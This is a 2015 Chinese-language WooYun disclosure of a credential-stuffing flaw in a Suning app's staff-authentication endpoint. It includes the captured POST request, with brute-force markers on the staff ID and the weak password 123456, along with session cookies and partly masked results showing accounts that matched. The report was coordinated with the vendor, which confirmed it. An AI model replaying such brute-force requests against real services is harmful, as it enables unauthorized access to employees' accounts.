当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127074

漏洞标题:苏宁某接口可撞库(员工号+SOA密码)

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: DloveJ

提交时间:2015-07-20 16:50

修复时间:2015-09-03 17:58

公开时间:2015-09-03 17:58

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-20: 厂商已经确认,细节仅向厂商公开
2015-07-30: 细节向核心白帽子及相关领域专家公开
2015-08-09: 细节向普通白帽子公开
2015-08-19: 细节向实习白帽子公开
2015-09-03: 细节向公众公开

简要描述:

哎,本来出去了,想着等装完就提洞,没想到回来的时候发现网断了(学校是登陆账号,一会儿15m就断),开机之后,发现iwindows update失败,弄了一会,弄不好,重装系统。这就到了今天早晨。╮(╯▽╰)╭

详细说明:

http://wd.suning.com/


11.png


果断下载,安装。在app的设置》个人账号》苏宁员工认证。

1.png

2.png


认证的同时抓包。


POST /suning-web-mobile/wd/bindStaff.do HTTP/1.1
Accept-Encoding: gzip
Cookie: cityId=;userId=6112844113;memberId=null;logonId=null;
Content-Length: 31
Content-Type: application/x-www-form-urlencoded
Host: mobts.suning.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0(Linux; U; Android 4.4.2; zh; deviceId:37a98c611d55d2ae; MX4) AppleWebKit/533.0 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Cookie: idsLoginUserIdLastTime=15661602493; custno=6112844113; authId=si3FCE21179E30769F7BB03A449D44FC67; nick=156******93; logonStatus=2; secureToken=E47BA7FD5BB36308977F683EFC6B58BD; nick2=156******93; _customId=6rdp54c59426
staffId=1009§0734§&staffPwd=123456


5.png


staffId标记后四位,密码123456(本来想组合,哎,网段的我都没什么兴趣了,只好就用123456)
生成一个四位数字典

6.png


123456成功的

mask 区域
*****false	34*****
*****false 36*****
*****false 34*****
***** false 3*****
***** false 3*****
***** false 3*****
***** false 3*****


其他弱口令,厂商自己查吧。这次撞库,=试一次忧伤的撞库
我就觉得少些图片这证明,刚才忘记放手机图片了。

1.png


2.png


棉麻正确的话会提示已绑定

3.png


错误的话,会提示员工号或者密码错误

4.png


这是我已经绑定了的。绑定成功后就没有认证接口了。

444.png

漏洞证明:

mask 区域
*****false	34*****
*****false 36*****
*****false 34*****
***** false 3*****
***** false 3*****
***** false 3*****
***** false 3*****


同样也是这个app反馈处

1.png


mask 区域
*****6 08:*****
*****ing.com/wd-admin*****
*****ning.com/wd-admin*****
*****me BkUiI zckwD6S81chbOHpBA/hQBwZ4x t2R8EeBXNmdMkFsy1QD4I0VF7QJ5yNYUxiglefkzI4X6l/wV1jJXvfqgNTRC5 TcuvOtFgy9kGNP0C8LYT7U7z/L97flIEJq9nQkbZGAfqoWO0xWfB0PTL1tL4zc6eESWy3fePAY6D7o42 5h7AilKQpNP3nNNltoR6UVfQxqNuXXXxV2K5JwT9yXGIbb7NrTk71IxO0WFJSu43pHgazqEIv8gILJ Gqc0hMi9SIL0zO1IDFwsG8ZFvWW/8j/xfxl0X3LMDBbRuV1nYF bBSw*****
*****r :*****
*****uning.com/wd-admi*****
*****) AppleWebKit/537.77.4 (KHTML, l*****


我擦勒,一个cookie这么长,我也是醉醉的。

修复方案:

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-20 17:56

厂商回复:

感谢提交。

最新状态:

暂无